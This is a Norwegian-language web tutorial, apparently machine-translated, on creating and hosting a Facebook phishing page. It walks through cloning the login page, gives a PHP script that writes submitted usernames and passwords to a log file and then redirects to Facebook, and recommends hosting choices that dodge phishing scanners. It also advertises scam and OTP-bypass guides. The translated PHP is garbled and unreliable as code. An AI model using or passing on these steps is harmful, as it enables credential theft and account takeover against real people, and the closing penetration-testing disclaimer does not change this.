Innholdsfortegnelse
Hvordan lage En facebook phishing link
Nylig har jeg kommet over mange guider om å lage phishing-sider. Selv om prinsippene bak hver guide er like, fungerer de fleste av hostingløsningene som tilbys i guiden, ikke lenger på grunn av en økning i nedslaget av phishing-sider av hostingselskapene. I denne veiledningen vil jeg gå gjennom hvert trinn som er nødvendig for å opprette og være vert for en phishing-side etter eget valg. Nyt!
Last NED HTML-Indeksen På Målsiden
for å starte, må DU skaffe HTML-indeksen på siden. Det finnes ulike metoder for å gjøre dette, det er til og med maler på nettet for populære nettsteder. I denne opplæringen skal jeg bruke den mest grunnleggende måten for å være så noob-vennlig som mulig.
Les også: slik oppretter du et phishing-nettsted ved hjelp av kali linux
Naviger Til Nettsiden din
I denne opplæringen skal Jeg phish Facebook.
Vis Kilden Til Nettsiden.
Avhengig av nettleseren din, kan det være forskjellige metoder. Normalt gjøres det ved å høyreklikke på nettstedet og klikke på «Vis Kilde». Jeg har gjort det på nettleseren min, og en windows skal komme ut som dette:
på boksen til høyre er kilden til nettstedet. Som fører videre til neste trinn:
Nedlasting Og Lagring Av Kildekoden
Velg boksen, og kopier-lim inn alt i boksen til et txt-dokument. Bruk Notisblokk på windows, og et enkelt tekstredigeringsprogram hvis du ikke bruker windows. (Ikke bruk programmer som Word eller Pages fordi det er veldig sakte). Når du har gjort det, klikk «Lagre som» eller hva alternativet som lar deg lagre dokumentet. På Notisblokk skal det se slik ut:
Endre «Lagre som type» Til Alle Filer og endre kodingen Til Unicode.
Deretter heter dokumentet » indeks.html», åpenbart uten talemerker.
Gratulerer! Du er ferdig med det første trinnet i opplæringen!
Les også: Slik Gjør Du Facebook scam uten å bli utestengt eller blokkert
LEKSJON 2
Opprette EN PHP-Fil For Passordhøsting
PHP-filen er i utgangspunktet verktøyet som høster brukernes passord i dette scenariet. DET er flere måter du kan lage DENNE PHP hvis du har litt programmeringskunnskap, men hvis du ikke gjør det, bare kopier mitt EKSEMPLAR PHP.
<?php
header (‘Plassering: facebook.com’);
$handle = fopen («logg.txt», «a»);
foreach ($_POST som $variabel = > $verdi) {
fwrite ($håndtak, $ variabel);
fwrite ($håndtak, «=»);
fwrite ($håndtak, $ verdi);
fwrite ($håndtak, «\ r \ n»);
}
fwrite ($håndtak, «\ r \ n \ n \ n \ n»);
fclose ($håndtak);
avslutt;
?>
samme som ovenfor, lagre PHP-filen som «Alle Filer»og som» post.php». Endre kodingen Til Unicode, og du bør være klar til å gå!
Endre Siden HTML-Fil For Å Innlemme PHP-Filen I Den.
nå må VI innlemme VÅR PHP-fil for å motta passord som brukerne sender.
Finn Passord-Sendemetoden
først må du se hvordan nettstedet handler når brukeren sender inn et brukernavn-passord.
For Facebook er Alt Du trenger Å Gjøre, Å Ctrl-F og skrive «= handling » i feltet.
nå må du erstatte alt i den understrekede delen med » post.php», hold talemerkene. (bare ett sett, vær så snill).
Selvfølgelig vil denne metoden være forskjellig for andre nettsteder. En god metode for å finne den er Ved Å Bruke Inspect Elements-verktøyet i de fleste moderne nettlesere og klikke på påloggingsknappen. Finn noe som ligner på metoden ovenfor.
Les også: Lær hvordan å hacke ATM-kort, maskiner som bruker Wizcardo programvare
merk: Du må endre dette senere når du faktisk vert nettstedet.
Hosting PHP-Filen For Passord Lagring
Nå er her den saftige delen, gjør din falske nettside online slik at andre kan bla gjennom den.
du kan bruke alle gratis hosting-tjenester til å være vert for og lagre passord. Hostingplanen må imidlertid inneholde noe som kalles «FTP». For denne opplæringen bruker jeg 000webhost.
Naviger Til FTP-Serveren For Web Hosting Service
for dette trinnet antar jeg at du allerede har opprettet et nettsted med din hosting service.
for 000webhost klikker du bare på «File manager» og klikker «Last Opp Filer». HER er et bilde AV FTP-serveren for 000webhost:
Ignorer de andre filene, det er bare noen av mine personlige ting, som ikke er relatert til denne opplæringen.
Last OPP PHP-Filene Dine Og Endre Tillatelse
som du kan se, har jeg allerede lastet OPP PHP-filen min. Men du må bare laste den opp til hovedmappen PÅ FTP-serveren din. (Noen FTP-server lar deg ikke laste opp til rotmappen, bare følg deres spesielle instruksjoner).
nå må du endre tillatelsen til «777», som i utgangspunktet er hver enkelt tillatelse. Når du blir bedt om å huke av for tillatelsene, bare huke hver eneste en.
nå kan DU lukke FTP-serveren. Skriv ned nettadressen din!
Les også: Trinninstruksjoner For Å Omgå OTP-Verifisering På Noen Nettsteder
Hosting Den Faktiske Phishing-Siden
for dette trinnet må du bruke den eksakte vertsleverandøren som jeg bruker, ellers blir du utestengt.
Det er en grunn til at jeg ikke bruker samme hosting leverandør for min faktiske side, og det er fordi de fleste hosting leverandører vil ansette noen form for skanning for å oppdage phishing-sider. Jeg kan prøvd flere hosting-tjenester tidligere, og alle forbød meg innen 30 minutter for å laste opp indeksfilen.
Konfigurere innlegget.php Forum
nå, før du er vert for nettstedet, husk innlegget.php / login form ting vi konfigurert ovenfor?
du må finne innloggingsskjemaet igjen i indeksen din.html og erstatte » post.php «med» http://yourwebsiteforyourpostphpupload/post.php», forutsatt at du lastet opp til rotmappen. Husk å legge til http: / / foran nettstedet. For å teste dette, naviger til nettstedet (http://yourwebsiteforyourpostphpupload/post.php) og se om det omdirigerer Deg Til Facebook.com, hvis det gjør det, har du limt inn riktig nettsted. Hvis den ikke gjør det, så dobbeltsjekke om du har lastet opp filen til riktig katalog.
Hosting Selve Siden
Naviger til htmlpasta.com. du vil se noe som ligner på dette:
deretter må du kopiere indeksen.html-fil for phishing-nettstedet ditt og lim det inn her.
nå, klikk på re og klikk lim inn, vil du få en link for ditt nettsted.
Konklusjon
Gratulerer! Du er ferdig med å være vert for ditt første phishing-nettsted! Naviger til nettstedet ditt og prøv å legge inn noen falske innloggingsdetaljer, når du klikker på innloggingsknappen, bør den omdirigere deg til facebook.com. Logg Inn PÅ FTP-serveren din som du var vert for innlegget ditt.php-fil, og det bør være et nytt dokument som heter Log.txt som er lagret i samme mappe som innlegget ditt.php-fil. Eventuelle innloggingsdetaljer skal lagres der.
Les også: 2020 yahoo yahoo-format, faktureringsformat, pdf-nedlasting
Vennligst ikke bruk dette til ondsinnet formål, bare bruk for penetrasjonstesting og med autorisasjon fra offeret ditt.
